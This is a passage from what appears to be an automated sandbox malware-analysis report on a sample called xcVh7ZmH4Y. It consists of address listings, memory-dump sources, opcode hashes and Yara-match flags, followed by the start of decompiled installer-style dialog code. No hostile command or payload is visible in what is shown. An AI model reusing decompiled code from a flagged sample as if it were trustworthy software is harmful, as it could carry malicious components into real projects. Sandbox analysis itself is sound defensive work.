                                                                                      0x0040767a
                                                                                      0x00407681
                                                                                      0x00407687
                                                                                      0x00407880
                                                                                      0x00407880
                                                                                      0x00407885
                                                                                      0x00407894
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407885
                                                                                      0x00407694
                                                                                      0x00407697
                                                                                      0x0040769a
                                                                                      0x0040769d
                                                                                      0x004076a1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076ac
                                                                                      0x004076af
                                                                                      0x004076b0
                                                                                      0x004076b2
                                                                                      0x004076b8
                                                                                      0x004076bb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076c1
                                                                                      0x004076c2
                                                                                      0x004076c5
                                                                                      0x004076c8
                                                                                      0x004076cb
                                                                                      0x004076d1
                                                                                      0x004076d3
                                                                                      0x004076d3
                                                                                      0x004076db
                                                                                      0x004076df
                                                                                      0x004076e4
                                                                                      0x00407709
                                                                                      0x0040770f
                                                                                      0x00407711
                                                                                      0x00407713
                                                                                      0x00407716
                                                                                      0x0040771f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076e6
                                                                                      0x004076e6
                                                                                      0x004076ef
                                                                                      0x004076f3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407704
                                                                                      0x00407704
                                                                                      0x00407707
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076f7
                                                                                      0x004076fa
                                                                                      0x004076fc
                                                                                      0x00407700
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407702
                                                                                      0x00407702
                                                                                      0x00000000
                                                                                      0x00407704
                                                                                      0x00407728
                                                                                      0x0040772e
                                                                                      0x00407738
                                                                                      0x0040773a
                                                                                      0x0040773f
                                                                                      0x00407741
                                                                                      0x00407777
                                                                                      0x00407743
                                                                                      0x00407743
                                                                                      0x00407746
                                                                                      0x00407749
                                                                                      0x00407753
                                                                                      0x00407756
                                                                                      0x0040775d
                                                                                      0x00407768
                                                                                      0x0040776f
                                                                                      0x0040776f
                                                                                      0x00407779
                                                                                      0x0040777c
                                                                                      0x0040777e
                                                                                      0x00407784
                                                                                      0x00407784
                                                                                      0x0040778d
                                                                                      0x00407790
                                                                                      0x00407795
                                                                                      0x004077a4
                                                                                      0x004077ac
                                                                                      0x004077b1
                                                                                      0x004077d5
                                                                                      0x004077dd
                                                                                      0x004077e1
                                                                                      0x004077e7
                                                                                      0x004077b3
                                                                                      0x004077c1
                                                                                      0x004077c4
                                                                                      0x004077ca
                                                                                      0x004077ca
                                                                                      0x004077eb
                                                                                      0x004077a6
                                                                                      0x004077a6
                                                                                      0x004077a6
                                                                                      0x004077fc
                                                                                      0x00407800
                                                                                      0x0040780c
                                                                                      0x00407807
                                                                                      0x0040780a
                                                                                      0x0040780a
                                                                                      0x00407814
                                                                                      0x00407819
                                                                                      0x00407821
                                                                                      0x0040781d
                                                                                      0x0040781f
                                                                                      0x0040781f
                                                                                      0x00407827
                                                                                      0x00407829
                                                                                      0x00407830
                                                                                      0x0040783a
                                                                                      0x00407844
                                                                                      0x00407860
                                                                                      0x00407864
                                                                                      0x004076a9
                                                                                      0x004076af
                                                                                      0x004076b0
                                                                                      0x004076b2
                                                                                      0x004076b8
                                                                                      0x004076bb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076bb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407846
                                                                                      0x00407846
                                                                                      0x00407846
                                                                                      0x0040784b
                                                                                      0x00407854
                                                                                      0x0040785d
                                                                                      0x00000000
                                                                                      0x0040785d
                                                                                      0x0040786a
                                                                                      0x0040786a
                                                                                      0x0040786d
                                                                                      0x00407874
                                                                                      0x00407877
                                                                                      0x00000000
                                                                                      0x0040769a
                                                                                      0x0040761a
                                                                                      0x0040761c
                                                                                      0x0040761c
                                                                                      0x00407620
                                                                                      0x00407623
                                                                                      0x00407624
                                                                                      0x00407624
                                                                                      0x00000000
                                                                                      0x0040761c
                                                                                      0x00407590
                                                                                      0x00407596
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                      • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                      • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                      • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4ADA1 Relevance: .3, Instructions: 290COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5ee9e833f7817d63086b7651fea46584802ae61c763bec8477c2ac69c5a212ec
                                                                                      • Instruction ID: b9dfa368171fa33a4e9660a359b9c5bc11bba99731c09352cd3aa097366dd528
                                                                                      • Opcode Fuzzy Hash: 5ee9e833f7817d63086b7651fea46584802ae61c763bec8477c2ac69c5a212ec
                                                                                      • Instruction Fuzzy Hash: 81A12475A082099FCB389E34C8A57EF7BE2AF95394F50451EDD8AD7254C7708A81CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F55830 Relevance: .3, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 498728252e7fb5574d1099f7aa5c8c6f0c417ebad937eafb12205c475d099e87
                                                                                      • Instruction ID: 3c252c0bfcb5f104930790b18d0ebf643b326607a3176b4c9cf2a92ddc4cedfa
                                                                                      • Opcode Fuzzy Hash: 498728252e7fb5574d1099f7aa5c8c6f0c417ebad937eafb12205c475d099e87
                                                                                      • Instruction Fuzzy Hash: 38A15A72A003A6DFDB308E38CD947DB77B2AF45790F94412ECE5A8B645E7305A85CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4ADFF Relevance: .3, Instructions: 262COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ac47eda242a5cdbbd1d91a4f37f86c8877eab3c1c88d8d2c2b89bd28e47fdec
                                                                                      • Instruction ID: 017b710e74ab8cf027c346f51907ee446e563afb50f128cfbfda708faa443aba
                                                                                      • Opcode Fuzzy Hash: 4ac47eda242a5cdbbd1d91a4f37f86c8877eab3c1c88d8d2c2b89bd28e47fdec
                                                                                      • Instruction Fuzzy Hash: 17914636A04245DFDB349E74D8A97EB77A2FF94394F50462EDC8AD7244C7318681CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4AEAA Relevance: .2, Instructions: 234COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac7e6f5f3fbf8a73bd45c146f5fb27408af3ca375643ad90ed52c7c4249e2418
                                                                                      • Instruction ID: 349f533f29d27bd032d72560d0496afebceb8977ccda8cd7fc0229fd4adea396
                                                                                      • Opcode Fuzzy Hash: ac7e6f5f3fbf8a73bd45c146f5fb27408af3ca375643ad90ed52c7c4249e2418
                                                                                      • Instruction Fuzzy Hash: 22812576608345DFDB389E74D8A97EE77A2EF94394F50062EDC8AD7244C7318681CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4AF5D Relevance: .2, Instructions: 203COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 278cd23bded7ea9a91c7f871c619131ffe48fac17fb48df472a6d6f1de9471d7
                                                                                      • Instruction ID: 6dbbf2f9cbb585b03e6c6973807302c4c09bc91ca867832d7a04b1161bb1f953
                                                                                      • Opcode Fuzzy Hash: 278cd23bded7ea9a91c7f871c619131ffe48fac17fb48df472a6d6f1de9471d7
                                                                                      • Instruction Fuzzy Hash: 97615635A08345DFCB349E74D8A97EE7BA2EF95394F50062EDC8AD7245C7318680CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4B022 Relevance: .2, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70bd7081c5b9085e99ec9d1fc435e313217132333d5307fb313fe77841749916
                                                                                      • Instruction ID: 0b820eb4afc414bf49f1555ade7492b818eba87bcef1c6c2577abb498019374d
                                                                                      • Opcode Fuzzy Hash: 70bd7081c5b9085e99ec9d1fc435e313217132333d5307fb313fe77841749916
                                                                                      • Instruction Fuzzy Hash: 875158366083059FDB389E74D8A97EE7BA2EF95394F600A1EDC8AD7241C7314681CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4AFED Relevance: .2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1c187063fbfd7eb6240b55c079b41184a742844b779262a51e69a0e1af2f5fc8
                                                                                      • Instruction ID: 3a27d4101afcf5c729d08e49e4d2d0bc3f68d3f9cda724cbf1d2b5a4b682d63b
                                                                                      • Opcode Fuzzy Hash: 1c187063fbfd7eb6240b55c079b41184a742844b779262a51e69a0e1af2f5fc8
                                                                                      • Instruction Fuzzy Hash: 3C514575A083059FCB389E74D8A97EE7BA2AF99784F50061EDC8AD7241C7718681CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4AFF5 Relevance: .2, Instructions: 155COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 593516d0ad8efcfa642845cf2c865122448f564cdeb2703afe2c6fa2b46bbec4
                                                                                      • Instruction ID: 5da4ee0cbd0f41449bbbd0d916f4d98a5fa862661cff6b3b1c1f1b1776485881
                                                                                      • Opcode Fuzzy Hash: 593516d0ad8efcfa642845cf2c865122448f564cdeb2703afe2c6fa2b46bbec4
                                                                                      • Instruction Fuzzy Hash: DC516875A08349CFCB38AE74D8957EE7BE2EF59784F10061EDC8A97245C7704681CB02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4B0BD Relevance: .2, Instructions: 152COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 563e2a7618df3ec1c592326409c6692b41716ebaf37762209fe3ad1cc9719075
                                                                                      • Instruction ID: fcdd95ab7bed37aa2e4a6d036eb97309ace373bfa408979de7d080fa62815ebd
                                                                                      • Opcode Fuzzy Hash: 563e2a7618df3ec1c592326409c6692b41716ebaf37762209fe3ad1cc9719075
                                                                                      • Instruction Fuzzy Hash: 62418C326483058FD7249EB4E9A57EAB7A2EF917D4F600A1FDC86D7184C7328591CB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4E245 Relevance: .1, Instructions: 123COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 427f0546d01a37b2f271753264303ea4cc618d1d5e43a2f3ab3166c1e33bc103
                                                                                      • Instruction ID: dc67904b878c3f12021f2c0fee72c480cccd884418f8bf925ed66e29425fe3bf
                                                                                      • Opcode Fuzzy Hash: 427f0546d01a37b2f271753264303ea4cc618d1d5e43a2f3ab3166c1e33bc103
                                                                                      • Instruction Fuzzy Hash: AB41C036600341CFEB24CE689AE43D2BB72FF553A4F94865ACD4ACF158C7368992CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4D560 Relevance: .1, Instructions: 123COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6baeb3097c63e0bc3e1836ac95533d47efa9e2805bbace63a5abb4cebc69d30f
                                                                                      • Instruction ID: 1502dad1aeaf9ba628f20f25d57017a0f547fe02bc3da47ece2a5df58c447ffe
                                                                                      • Opcode Fuzzy Hash: 6baeb3097c63e0bc3e1836ac95533d47efa9e2805bbace63a5abb4cebc69d30f
                                                                                      • Instruction Fuzzy Hash: 1F4147716007048FEB24DF29C9947DAB3E2FF95390F01812EDC8A9B254DB749941CF81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4B181 Relevance: .1, Instructions: 114COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c03a3574570af15a942f72a8d62a256bfd5a3d3f54e5c2b1e56acad0662b8d73
                                                                                      • Instruction ID: 3089f0c19b0fcd41d7056a4caffa6eec46e715ca7cefeefaa84616c09b8479c3
                                                                                      • Opcode Fuzzy Hash: c03a3574570af15a942f72a8d62a256bfd5a3d3f54e5c2b1e56acad0662b8d73
                                                                                      • Instruction Fuzzy Hash: CF318A36644706DFE7145EB4E9957EAB7A2EF913E4F60091FDC86D3184C7324081CB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F56019 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 99e3dfb7b23b2084d17eedc7f9deb6e4a64c9ee00044049dc6853d652e326f15
                                                                                      • Instruction ID: e8043ec5de809e2266ea4f17c8fc3fa5948be97a92ea0c2447390530ed4b7436
                                                                                      • Opcode Fuzzy Hash: 99e3dfb7b23b2084d17eedc7f9deb6e4a64c9ee00044049dc6853d652e326f15
                                                                                      • Instruction Fuzzy Hash: C53157317047559BEF385E398AA53FB26A36F55290F84412FDE4BD7289DB3189848302
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4D59D Relevance: .1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 79bca7b4caeb1ff6dbeef7fd86f35fa06e298026b4e6eb4b91d166151a38cd6f
                                                                                      • Instruction ID: 6555b5308d387a0050f65356b12a90b93fd802da936b5cb5626d3678bc1ee753
                                                                                      • Opcode Fuzzy Hash: 79bca7b4caeb1ff6dbeef7fd86f35fa06e298026b4e6eb4b91d166151a38cd6f
                                                                                      • Instruction Fuzzy Hash: 914112B19417059FEB24DF29C858BDAB7A2FF153D0F02816ECC8A9B254DB759A41CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4E19D Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0edc99e0eda9db6cf0cfb649ba4e4c663d00c47a9ad74c5bae10ffe5ed4d79cb
                                                                                      • Instruction ID: cb7c169c01172d6c37f6d4552d864e607fd6cf034ef7090b979015904934a932
                                                                                      • Opcode Fuzzy Hash: 0edc99e0eda9db6cf0cfb649ba4e4c663d00c47a9ad74c5bae10ffe5ed4d79cb
                                                                                      • Instruction Fuzzy Hash: C5214373200702CFE3019EB89AA47D6B7B2FF653E0F51042AEC82CB154D33248428A95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F54D4B Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60b2fbc27aeb9990f00607bbefcbb435644d752ddd45dfd49efd55af0baa8314
                                                                                      • Instruction ID: 781f3a034913cf74ab2ace53ce206c698904f9a0c5c22f47877ca8e708f77ff8
                                                                                      • Opcode Fuzzy Hash: 60b2fbc27aeb9990f00607bbefcbb435644d752ddd45dfd49efd55af0baa8314
                                                                                      • Instruction Fuzzy Hash: 12219F3564939ACBDB30CF28C8D07DB33A1AF4A750F45021DDE8A8B211E7349686DB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4E189 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d1c04ae2514859480558d5c31a6d1f3463321222a8370b19b61375f0d9725ac5
                                                                                      • Instruction ID: c727a4450cb78c61cf77c7e7cba0e416ea5d8b49efb14d33d22ed2e63ffc93ac
                                                                                      • Opcode Fuzzy Hash: d1c04ae2514859480558d5c31a6d1f3463321222a8370b19b61375f0d9725ac5
                                                                                      • Instruction Fuzzy Hash: 771136B2608346CFD3119F798AA43DA7BB6AF573C0F06409ADCD28B124D3314D068751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4AAF1 Relevance: .0, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                                      • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
                                                                                      • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F5477E Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                      • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                                                      • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                      • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 96%
                                                                                      			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
